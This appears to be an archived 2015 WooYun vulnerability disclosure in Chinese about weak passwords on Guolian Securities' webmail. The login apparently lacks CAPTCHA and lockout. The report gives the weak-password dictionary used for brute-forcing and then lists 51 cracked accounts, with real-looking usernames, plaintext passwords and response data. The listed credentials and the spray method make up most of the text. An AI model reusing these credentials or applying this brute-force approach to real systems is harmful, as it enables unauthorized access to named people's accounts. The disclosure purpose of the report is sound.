乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-26: 细节已通知厂商并且等待厂商处理中 2015-10-26: 厂商已经确认,细节仅向厂商公开 2015-11-05: 细节向核心白帽子及相关领域专家公开 2015-11-15: 细节向普通白帽子公开 2015-11-25: 细节向实习白帽子公开 2015-12-10: 细节向公众公开
弱口令害死人
站点:http://mail2.glsc.com.cn:8084/国联证券的邮箱系统,没有验证码和对输入密码错误次数的限制,导致可被爆破采用
%username%%username%123123456654321111111888888等弱口令
爆破出弱口令用户,嗯,不多,51个,还有,不再继续了,证明问题严重性即可
33 zhongtai zhongtai123 302 false false 532 704 pengyb pengyb123 302 false false 532 574 gxzjj gxzjj 302 false false 544 626 zhangcy zhangcy 302 false false 532 836 zhutt zhutt 302 false false 532 62 renwd 123456 302 false false 532 127 fengk 123456 302 false false 532 483 jixl 123456 302 false false 532 814 zengss 123456 302 false false 532 955 lilin 123456 302 false false 532 8 dingyj 123123 302 false false 532 15 wanss 123123 302 false false 532 45 gloud2 123123 302 false false 532 46 gloud3 123123 302 false false 532 469 yaol 123123 302 false false 532 594 zhangjunl 123123 302 false false 532 613 zhangn 123123 302 false false 532 926 lixinr 123123 302 false false 532 67 wuly 12345 302 false false 532 87 yumk 12345 302 false false 532 161 liugj 12345 302 false false 532 220 baoyq 12345 302 false false 532 797 caol 1qaz2wsx 302 false false 532 500 sunxy 111111 302 false false 532 185 liuyang 520520 302 false false 532 405 tangj 666666 302 false false 532 717 xujiao 666666 302 false false 532 523 jil 654321 302 false false 532 737 xumz 654321 302 false false 532 301 wujiay 888888 302 false false 532 300 wujiay 888888 302 false false 532 304 wuxil 888888 302 false false 532 324 wukj 888888 302 false false 532 327 wupp 888888 302 false false 532 347 zhouwp 888888 302 false false 532 394 zhoujiej 888888 302 false false 532 400 zhouwen 888888 302 false false 532 401 zhouqing 888888 302 false false 532 490 sunz 888888 302 false false 532 497 sunmx 888888 302 false false 532 545 xjkjb 888888 302 false false 544 589 zhangyunyx 888888 302 false false 532 595 zqian 888888 302 false false 532 652 zhangjf 888888 302 false false 532 660 zhanghao 888888 302 false false 544 670 zhangym 888888 302 false false 532 672 zhangyu 888888 302 false false 532 723 xushl 888888 302 false false 532 756 xuyin 888888 302 false false 532 852 zhuxl 888888 302 false false 532 941 lizq 888888 302 false false 532
竟然还找出来一个广西证监局的账号,不知道是真的假的
看见国联证券内部有一个关于口令复杂化的报告,但是大家好像都不太认真
统一修改复杂口令,之后下发通知整改弱口令
危害等级:高
漏洞Rank:15
确认时间:2015-10-26 08:43
感谢发现
暂无